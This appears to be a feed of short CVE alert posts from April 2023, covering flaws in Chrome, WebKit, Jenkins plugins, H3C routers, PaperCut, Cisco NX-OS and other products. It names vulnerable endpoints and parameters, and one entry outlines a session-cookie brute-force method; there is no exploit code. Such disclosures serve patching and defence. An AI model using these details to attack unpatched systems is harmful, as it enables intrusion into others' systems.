🚨 CVE-2022-47930An issue was discovered in IO FinNet tss-lib before 2.0.0. The parameter ssid for defining a session id is not used through the MPC implementation, which makes replaying and spoofing of messages easier. In particular, the Schnorr proof of knowledge implemented in sch.go does not utilize a session id, context, or random nonce in the generation of the challenge. This could allow a malicious user or an eavesdropper to replay a valid proof sent in the past.🎖@cveNotify |
|
| 2023-04-21 20:58:21 |
🚨 CVE-2023-26557io.finnet tss-lib before 2.0.0 can leak the lambda value of a private key via a timing side-channel attack because it relies on Go big.Int, which is not constant time for Cmp, modular exponentiation, or modular inverse. An example leak is in crypto/paillier/paillier.go. (bnb-chain/tss-lib and thorchain/tss are also affected.)🎖@cveNotify |
|
| 2023-04-21 20:58:20 |
🚨 CVE-2023-28205A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-04-21 20:58:17 |
🚨 CVE-2022-43309Supermicro X11SSL-CF HW Rev 1.01, BMC firmware v1.63 was discovered to contain insecure permissions.🎖@cveNotify |
|
| 2023-04-21 20:58:16 |
🚨 CVE-2023-25358A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely.🎖@cveNotify |
|
| 2023-04-21 20:58:15 |
🚨 CVE-2023-25361A use-after-free vulnerability in WebCore::RenderLayer::setNextSibling in WebKitGTK before 2.36.8 allows attackers to execute code remotely.🎖@cveNotify |
|
| 2023-04-21 20:58:14 |
🚨 CVE-2023-25362A use-after-free vulnerability in WebCore::RenderLayer::repaintBlockSelectionGaps in WebKitGTK before 2.36.8 allows attackers to execute code remotely.🎖@cveNotify |
|
| 2023-04-21 18:58:36 |
🚨 CVE-2023-2021Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.3.🎖@cveNotify |
|
| 2023-04-21 18:58:35 |
🚨 CVE-2023-29597bloofox v0.5.2 was discovered to contain a SQL injection vulnerability via the component /index.php?mode=content&page=pages&action=edit&eid=1.🎖@cveNotify |
|
| 2023-04-21 18:58:31 |
🚨 CVE-2023-29598lmxcms v1.4.1 was discovered to contain a SQL injection vulnerability via the setbook parameter at index.php.🎖@cveNotify |
|
| 2023-04-21 18:58:30 |
🚨 CVE-2023-30514Jenkins Azure Key Vault Plugin 187.va_cd5fecd198a_ and earlier does not properly mask (i.e., replace with asterisks) credentials in the build log when push mode for durable task logging is enabled.🎖@cveNotify |
|
| 2023-04-21 18:58:29 |
🚨 CVE-2023-1992RPCoRDMA dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-21 18:58:25 |
🚨 CVE-2023-30515Jenkins Thycotic DevOps Secrets Vault Plugin 1.0.0 and earlier does not properly mask (i.e., replace with asterisks) credentials in the build log when push mode for durable task logging is enabled.🎖@cveNotify |
|
| 2023-04-21 18:58:24 |
🚨 CVE-2023-2139A reflected Cross-site Scripting (XSS) Vulnerability in DELMIA Apriso Release 2017 through Release 2022 allows an attacker to execute arbitrary script code.🎖@cveNotify |
|
| 2023-04-21 18:58:23 |
🚨 CVE-2023-2140A Server-Side Request Forgery vulnerability in DELMIA Apriso Release 2017 through Release 2022 could allow an unauthenticated attacker to issue requests to arbitrary hosts on behalf of the server running the DELMIA Apriso application.🎖@cveNotify |
|
| 2023-04-21 18:58:19 |
🚨 CVE-2023-2141An unsafe .NET object deserialization in DELMIA Apriso Release 2017 through Release 2022 could lead to post-authentication remote code execution.🎖@cveNotify |
|
| 2023-04-21 18:58:18 |
🚨 CVE-2023-0004A local file deletion vulnerability in Palo Alto Networks PAN-OS software enables an authenticated administrator to delete files from the local file system with elevated privileges.These files can include logs and system components that impact the integrity and availability of PAN-OS software.🎖@cveNotify |
|
| 2023-04-21 18:58:17 |
🚨 CVE-2023-28093A user with a compromised configuration can start an unsigned binary as a service.🎖@cveNotify |
|
| 2023-04-21 16:58:41 |
🚨 CVE-2023-26876SQL injection vulnerability found in Piwigo v.13.5.0 and before allows a remote attacker to execute arbitrary code via the filter_user_id parameter to the admin.php?page=history&filter_image_id=&filter_user_id endpoint.🎖@cveNotify |
|
| 2023-04-21 16:58:39 |
🚨 CVE-2023-29911H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the AddMacList interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:38 |
🚨 CVE-2023-29906H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:37 |
🚨 CVE-2023-29912H3C Magic R200 R200V100R004 was discovered to contain a stack overflow via the DelvsList interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:35 |
🚨 CVE-2023-29907H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:34 |
🚨 CVE-2023-29913H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetAPWifiorLedInfoById interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:32 |
🚨 CVE-2023-29914H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:30 |
🚨 CVE-2023-29908H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the SetMobileAPInfoById interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:28 |
🚨 CVE-2023-29915H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via CMD parameter at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:27 |
🚨 CVE-2023-29916H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateWanParams interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:26 |
🚨 CVE-2023-29917H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via go parameter at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:24 |
🚨 CVE-2023-29905H3C Magic R200 version R200V100R004 was discovered to contain a stack overflow via the UpdateSnat interface at /goform/aspForm.🎖@cveNotify |
|
| 2023-04-21 16:58:23 |
🚨 CVE-2023-2231A vulnerability, which was classified as critical, was found in MAXTECH MAX-G866ac 0.4.1_TBRO_20160314. This affects an unknown part of the component Remote Management. The manipulation leads to missing authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227001 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-21 16:58:22 |
🚨 CVE-2023-28121An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.🎖@cveNotify |
|
| 2023-04-21 16:58:20 |
🚨 CVE-2023-29581yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function delete_Token at /nasm/nasm-pp.c.🎖@cveNotify |
|
| 2023-04-21 16:58:19 |
🚨 CVE-2023-24545On affected platforms running Arista CloudEOS an issue in the Software Forwarding Engine (Sfe) can lead to a potential denial of service attack by sending malformed packets to the switch. This causes a leak of packet buffers and if enough malformed packets are received, the switch may eventually stop forwarding traffic.🎖@cveNotify |
|
| 2023-04-21 16:58:18 |
🚨 CVE-2023-30516Jenkins Image Tag Parameter Plugin 2.0 improperly introduces an option to opt out of SSL/TLS certificate validation when connecting to Docker registries, resulting in job configurations using Image Tag Parameters that were created before 2.0 having SSL/TLS certificate validation disabled by default.🎖@cveNotify |
|
| 2023-04-21 16:58:17 |
🚨 CVE-2023-29580yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the component yasm_expr_create at /libyasm/expr.c.🎖@cveNotify |
|
| 2023-04-21 16:58:15 |
🚨 CVE-2023-24511On affected platforms running Arista EOS with SNMP configured, a specially crafted packet can cause a memory leak in the snmpd process. This may result in the snmpd processing being terminated (causing SNMP requests to time out until snmpd is automatically restarted) and potential memory resource exhaustion for other processes on the switch. The vulnerability does not have any confidentiality or integrity impacts to the system.🎖@cveNotify |
|
| 2023-04-21 16:58:14 |
🚨 CVE-2023-30517Jenkins NeuVector Vulnerability Scanner Plugin 1.22 and earlier unconditionally disables SSL/TLS certificate and hostname validation when connecting to a configured NeuVector Vulnerability Scanner server.🎖@cveNotify |
|
| 2023-04-21 05:58:42 |
🚨 CVE-2022-43696OX App Suite before 7.10.6-rev20 allows XSS via upsell ads.🎖@cveNotify |
|
| 2023-04-21 05:58:41 |
🚨 CVE-2022-43698OX App Suite before 7.10.6-rev30 allows SSRF because changing a POP3 account disregards the deny-list.🎖@cveNotify |
|
| 2023-04-21 05:58:40 |
🚨 CVE-2023-2133Out of bounds memory access in Service Worker API in Google Chrome prior to 112.0.5615.137 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-21 05:58:36 |
🚨 CVE-2023-2135Use after free in DevTools in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who convinced a user to enable specific preconditions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-21 05:58:35 |
🚨 CVE-2023-2136Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-21 05:58:34 |
🚨 CVE-2022-37306OX App Suite before 7.10.6-rev30 allows XSS via an upsell trigger.🎖@cveNotify |
|
| 2023-04-21 05:58:30 |
🚨 CVE-2023-2033Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-21 05:58:29 |
🚨 CVE-2023-27648Directory Traversal vulnerability found in T-ME Studios Change Color of Keypad v.1.275.1.277 allows a remote attacker to execute arbitrary code via the dex file in the internal storage.🎖@cveNotify |
|
| 2023-04-21 05:58:28 |
🚨 CVE-2023-27653An issue found in WHOv.1.0.28, v.1.0.30, v.1.0.32 allows an attacker to cause a denial of service via the SharedPreference files.🎖@cveNotify |
|
| 2023-04-21 05:58:24 |
🚨 CVE-2022-36440A reachable assertion was found in Frrouting frr-bgpd 8.3.0 in the peek_for_as4_capability function. Attackers can maliciously construct BGP open packets and send them to BGP peers running frr-bgpd, resulting in DoS.🎖@cveNotify |
|
| 2023-04-21 05:58:23 |
🚨 CVE-2023-28756A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.🎖@cveNotify |
|
| 2023-04-21 05:58:22 |
🚨 CVE-2019-19921runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)🎖@cveNotify |
|
| 2023-04-21 00:58:18 |
🚨 CVE-2023-27351This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SecurityRequestFilter class. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19226.🎖@cveNotify |
|
| 2023-04-21 00:58:17 |
🚨 CVE-2023-27353This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Sonos One Speaker 70.3-35220. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msprox endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-19846.🎖@cveNotify |
|
| 2023-04-21 00:58:13 |
🚨 CVE-2023-27354This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Sonos One Speaker 70.3-35220. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of the SMB directory query command. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before reading from memory. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-19727.🎖@cveNotify |
|
| 2023-04-21 00:58:12 |
🚨 CVE-2023-30531Jenkins Consul KV Builder Plugin 2.0.13 and earlier does not mask the HashiCorp Consul ACL Token on the global configuration form, increasing the potential for attackers to observe and capture it.🎖@cveNotify |
|
| 2023-04-21 00:58:11 |
🚨 CVE-2023-30530Jenkins Consul KV Builder Plugin 2.0.13 and earlier stores the HashiCorp Consul ACL Token unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-04-20 22:58:30 |
🚨 CVE-2023-28458pretalx 2.3.1 before 2.3.2 allows path traversal in HTML export (a non-default feature). Organizers can trigger the overwriting (with the standard pretalx 404 page content) of an arbitrary file.🎖@cveNotify |
|
| 2023-04-20 22:58:29 |
🚨 CVE-2023-2131Versions of INEA ME RTU firmware prior to 3.36 are vulnerable to OS command injection, which could allow an attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2023-04-20 22:58:28 |
🚨 CVE-2023-2176A vulnerability was found in compare_netdev_and_ip in drivers/infiniband/core/cma.c in RDMA in the Linux Kernel. The improper cleanup results in out-of-boundary read, where a local user can utilize this problem to crash the system or escalation of privilege.🎖@cveNotify |
|
| 2023-04-20 22:58:25 |
🚨 CVE-2023-2177A null pointer dereference issue was found in the sctp network protocol in net/sctp/stream_sched.c in Linux Kernel. If stream_in allocation is failed, stream_out is freed which would further be accessed. A local user could use this flaw to crash the system or potentially cause a denial of service.🎖@cveNotify |
|
| 2023-04-20 22:58:24 |
🚨 CVE-2021-36436An issue in Mobicint Backend for Credit Unions v3 allows attackers to retrieve partial email addresses and user entered information via submission to the forgotten-password endpoint.🎖@cveNotify |
|
| 2023-04-20 22:58:23 |
🚨 CVE-2023-27216An issue found in D-Link DSL-3782 v.1.03 allows remote authenticated users to execute arbitrary code as root via the network settings page.🎖@cveNotify |
|
| 2023-04-20 22:58:19 |
🚨 CVE-2023-1552ToolboxST prior to version 7.10 is affected by a deserialization vulnerability. An attacker with local access to an HMI or who has conducted a social engineering attack on an authorized operator could execute code in a Toolbox user's context through the deserialization of an untrusted configuration file. Two CVSS scores have been provided to capture the differences between the two aforementioned attack vectors. Customers are advised to update to ToolboxST 7.10 which can be found in ControlST 7.10. If unable to update at this time customers should ensure they are following the guidance laid out in GE Gas Power's Secure Deployment Guide (GEH-6839). Customers should ensure they are not running ToolboxST as an Administrative user. 🎖@cveNotify |
|
| 2023-04-20 22:58:18 |
🚨 CVE-2023-23277Snippet-box 1.0.0 is vulnerable to Cross Site Scripting (XSS). Remote attackers can render arbitrary web script or HTML from the "Snippet code" form field.🎖@cveNotify |
|
| 2023-04-20 22:58:17 |
🚨 CVE-2023-30519A missing permission check in Jenkins Quay.io trigger Plugin 0.1 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.🎖@cveNotify |
|
| 2023-04-20 22:58:13 |
🚨 CVE-2023-30521A missing permission check in Jenkins Assembla merge request builder Plugin 1.1.13 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.🎖@cveNotify |
|
| 2023-04-20 22:58:12 |
🚨 CVE-2023-30522A missing permission check in Jenkins Fogbugz Plugin 2.2.17 and earlier allows attackers with Item/Read permission to trigger builds of jobs specified in a 'jobname' request parameter.🎖@cveNotify |
|
| 2023-04-20 22:58:11 |
🚨 CVE-2023-30523Jenkins Report Portal Plugin 0.5 and earlier stores ReportPortal access tokens unencrypted in job config.xml files on the Jenkins controller as part of its configuration where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-04-20 20:58:12 |
🚨 CVE-2017-20119A vulnerability classified as problematic has been found in TrueConf Server 4.3.7. This affects an unknown part of the file /admin/general/change-lang. The manipulation of the argument redirect_url leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2023-04-20 20:58:11 |
🚨 CVE-2017-20117A vulnerability was found in TrueConf Server 4.3.7. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/group. The manipulation leads to basic cross site scripting (DOM). The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2023-04-20 19:58:35 |
🚨 CVE-2023-21987Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.44 and Prior to 7.0.8. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-04-20 19:58:34 |
🚨 CVE-2022-36788A heap-based buffer overflow vulnerability exists in the TriangleMesh clone functionality of Slic3r libslic3r 1.3.0 and Master Commit b1a5500. A specially-crafted STL file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2023-04-20 19:58:33 |
🚨 CVE-2023-25601On version 3.0.0 through 3.1.1, Apache DolphinScheduler's python gateway suffered from improper authentication: an attacker could use a socket bytes attack without authentication. This issue has been fixed from version 3.1.2 onwards. For users who use version 3.0.0 to 3.1.1, you can turn off the python-gateway function by changing the value `python-gateway.enabled=false` in configuration file `application.yaml`. If you are using the python gateway, please upgrade to version 3.1.2 or above.🎖@cveNotify |
|
| 2023-04-20 19:58:32 |
🚨 CVE-2023-27350This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.🎖@cveNotify |
|
| 2023-04-20 19:58:31 |
🚨 CVE-2023-27351This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SecurityRequestFilter class. The issue results from improper implementation of the authentication algorithm. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19226.🎖@cveNotify |
|
| 2023-04-20 19:58:30 |
🚨 CVE-2023-1255Issue summary: The AES-XTS cipher decryption implementation for 64 bit ARMplatform contains a bug that could cause it to read past the input buffer,leading to a crash.Impact summary: Applications that use the AES-XTS algorithm on the 64 bit ARMplatform can crash in rare circumstances. The AES-XTS algorithm is usuallyused for disk encryption.The AES-XTS cipher decryption implementation for 64 bit ARM platform will readpast the end of the ciphertext buffer if the ciphertext size is 4 mod 5, e.g.144 bytes or 1024 bytes. If the memory after the ciphertext buffer isunmapped, this will trigger a crash which results in a denial of service.If an attacker can control the size and location of the ciphertext bufferbeing decrypted by an application using AES-XTS on 64 bit ARM, theapplication is affected. This is fairly unlikely making this issuea Low severity one.🎖@cveNotify |
|
| 2023-04-20 19:58:29 |
🚨 CVE-2023-23938Tuleap is a Free & Source tool for end to end traceability of application and system developments. Affected versions are subject to a cross site scripting attack which can be injected in the name of a color of select box values of a tracker and then reflected in the tracker administration. Administrative privilege is required, but an attacker with tracker administration rights could use this vulnerability to force a victim to execute uncontrolled code in the context of their browser. This issue has been addressed in Tuleap Community Edition version 14.5.99.4. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-04-20 19:58:28 |
🚨 CVE-2023-29926PowerJob V4.3.2 has unauthorized interface that causes remote code execution.🎖@cveNotify |
|
| 2023-04-20 19:58:27 |
🚨 CVE-2021-1368A vulnerability in the Unidirectional Link Detection (UDLD) feature of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to execute arbitrary code with administrative privileges or cause a denial of service (DoS) condition on an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted Cisco UDLD protocol packets to a directly connected, affected device. A successful exploit could allow the attacker to execute arbitrary code with administrative privileges or cause the Cisco UDLD process to crash and restart multiple times, causing the affected device to reload and resulting in a DoS condition. Note: The UDLD feature is disabled by default, and the conditions to exploit this vulnerability are strict. The attacker needs full control of a directly connected device. That device must be connected over a port channel that has UDLD enabled. To trigger arbitrary code execution, both the UDLD-enabled port channel and specific system conditions must exist. In the absence of either the UDLD-enabled port channel or the system conditions, attempts to exploit this vulnerability will result in a DoS condition. It is possible, but highly unlikely, that an attacker could control the necessary conditions for exploitation. The CVSS score reflects this possibility. However, given the complexity of exploitation, Cisco has assigned a Medium Security Impact Rating (SIR) to this vulnerability.🎖@cveNotify |
|
| 2023-04-20 19:58:26 |
🚨 CVE-2018-0395A vulnerability in the Link Layer Discovery Protocol (LLDP) implementation for Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition when the device unexpectedly reloads. The vulnerability is due to improper input validation of certain type, length, value (TLV) fields of the LLDP frame header. An attacker could exploit this vulnerability by sending a crafted LLDP packet to an interface on the targeted device. A successful exploit could allow the attacker to cause the switch to reload unexpectedly.🎖@cveNotify |
|
| 2023-04-20 19:58:25 |
🚨 CVE-2022-2560This vulnerability allows remote attackers to delete arbitrary files on affected installations of EnterpriseDT CompleteFTP 22.1.0 Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the HttpFile class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to delete files in the context of SYSTEM. Was ZDI-CAN-17481.🎖@cveNotify |
|
| 2023-04-20 19:58:24 |
🚨 CVE-2022-2848This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kepware KEPServerEX 6.11.718.0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of text encoding conversions. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-16486.🎖@cveNotify |
|
| 2023-04-20 19:58:22 |
🚨 CVE-2022-2825This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kepware KEPServerEX 6.11.718.0. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of text encoding conversions. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-18411.🎖@cveNotify |
|
| 2023-04-20 19:58:21 |
🚨 CVE-2022-28365Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture, and file/directory details.🎖@cveNotify |
|
| 2023-04-20 19:58:20 |
🚨 CVE-2021-44151An issue was discovered in Reprise RLM 14.2. As the session cookies are small, an attacker can hijack any existing sessions by bruteforcing the 4 hex-character session cookie on the Windows version (the Linux version appears to have 8 characters). An attacker can obtain the static part of the cookie (cookie name) by first making a request to any page on the application (e.g., /goforms/menu) and saving the name of the cookie sent with the response. The attacker can then use the name of the cookie and try to request that same page, setting a random value for the cookie. If any user has an active session, the page should return with the authorized content, when a valid cookie value is hit.🎖@cveNotify |
|
| 2023-04-20 19:58:19 |
🚨 CVE-2021-44155An issue was discovered in /goform/login_process in Reprise RLM 14.2. When an attacker attempts to login, the response if a username is valid includes Login Failed, but does not include this string if the username is invalid. This allows an attacker to enumerate valid users.🎖@cveNotify |
|
| 2023-04-20 19:58:18 |
🚨 CVE-2023-27912A maliciously crafted X_B file when parsed through Autodesk® AutoCAD® 2023 can force an Out-of-Bound Read. A malicious actor can leverage this vulnerability to cause a crash or read sensitive data or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2023-04-20 19:58:17 |
🚨 CVE-2023-27913A maliciously crafted X_B file when parsed through Autodesk® AutoCAD® 2023 can be used to cause an Integer Overflow. A malicious actor can leverage this vulnerability to cause a crash or read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2023-04-20 19:58:16 |
🚨 CVE-2023-27914A maliciously crafted X_B file when parsed through Autodesk® AutoCAD® 2023 can be used to write beyond the allocated buffer causing a Stack Buffer Overflow. A malicious actor can leverage this vulnerability to cause a crash or read sensitive data or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2023-04-20 19:58:15 |
🚨 CVE-2023-27915A maliciously crafted X_B file when parsed through Autodesk® AutoCAD® 2023 could lead to memory corruption vulnerability by read access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2023-04-20 17:58:40 |
🚨 CVE-2019-1597Multiple vulnerabilities in the implementation of the Lightweight Directory Access Protocol (LDAP) feature in Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerabilities are due to the improper parsing of LDAP packets by an affected device. An attacker could exploit these vulnerabilities by sending an LDAP packet crafted using Basic Encoding Rules (BER) to an affected device. The LDAP packet must have a source IP address of an LDAP server configured on the targeted device. A successful exploit could cause the affected device to reload, resulting in a DoS condition. Firepower 4100 Series Next-Generation Firewalls are affected in versions prior to 2.0.1.201, 2.2.2.54, and 2.3.1.75. Firepower 9300 Security Appliances are affected in versions prior to 2.0.1.201, 2.2.2.54 and 2.3.1.75. MDS 9000 Series Multilayer Switches are affected in versions prior to 8.2(1). Nexus 3000 Series Switches are affected in versions prior to 7.0(3)I7(1). Nexus 3500 Platform Switches are affected in versions prior to 7.0(3)I7(2). Nexus 7000 and 7700 Series Switches are affected in versions prior to 8.2(1). Nexus 9000 Series Switches in Standalone NX-OS Mode are affected in versions prior to 7.0(3)I7(1). Cisco UCS 6200 and 6300 Fabric Interconnect devices are affected in versions prior to 3.2(2b).🎖@cveNotify |
|
| 2023-04-20 17:58:39 |
🚨 CVE-2017-3883A vulnerability in the authentication, authorization, and accounting (AAA) implementation of Cisco Firepower Extensible Operating System (FXOS) and NX-OS System Software could allow an unauthenticated, remote attacker to cause an affected device to reload. The vulnerability occurs because AAA processes prevent the NX-OS System Manager from receiving keepalive messages when an affected device receives a high rate of login attempts, such as in a brute-force login attack. System memory can run low on the FXOS devices under the same conditions, which could cause the AAA process to unexpectedly restart or cause the device to reload. An attacker could exploit this vulnerability by performing a brute-force login attack against a device that is configured with AAA security services. A successful exploit could allow the attacker to cause the affected device to reload. This vulnerability affects the following Cisco products if they are running Cisco FXOS or NX-OS System Software that is configured for AAA services: Firepower 4100 Series Next-Generation Firewall, Firepower 9300 Security Appliance, Multilayer Director Switches, Nexus 1000V Series Switches, Nexus 1100 Series Cloud Services Platforms, Nexus 2000 Series Switches, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches in NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Unified Computing System (UCS) 6100 Series Fabric Interconnects, UCS 6200 Series Fabric Interconnects, UCS 6300 Series Fabric Interconnects. Cisco Bug IDs: CSCuq58760, CSCuq71257, CSCur97432, CSCus05214, CSCux54898, CSCvc33141, CSCvd36971, CSCve03660.🎖@cveNotify |
|
| 2023-04-20 17:58:38 |
🚨 CVE-2020-3120A vulnerability in the Cisco Discovery Protocol implementation for Cisco FXOS Software, Cisco IOS XR Software, and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a reload of an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to a missing check when the affected software processes Cisco Discovery Protocol messages. An attacker could exploit this vulnerability by sending a malicious Cisco Discovery Protocol packet to an affected device. A successful exploit could allow the attacker to exhaust system memory, causing the device to reload. Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).🎖@cveNotify |
|
| 2023-04-20 17:58:37 |
🚨 CVE-2020-3172A vulnerability in the Cisco Discovery Protocol feature of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to execute arbitrary code as root or cause a denial of service (DoS) condition on an affected device. The vulnerability exists because of insufficiently validated Cisco Discovery Protocol packet headers. An attacker could exploit this vulnerability by sending a crafted Cisco Discovery Protocol packet to a Layer 2-adjacent affected device. A successful exploit could allow the attacker to cause a buffer overflow that could allow the attacker to execute arbitrary code as root or cause a DoS condition on the affected device. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Note: This vulnerability is different from the following Cisco FXOS and NX-OS Software Cisco Discovery Protocol vulnerabilities that Cisco announced on Feb. 5, 2020: Cisco FXOS, IOS XR, and NX-OS Software Cisco Discovery Protocol Denial of Service Vulnerability and Cisco NX-OS Software Cisco Discovery Protocol Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-04-20 17:58:36 |
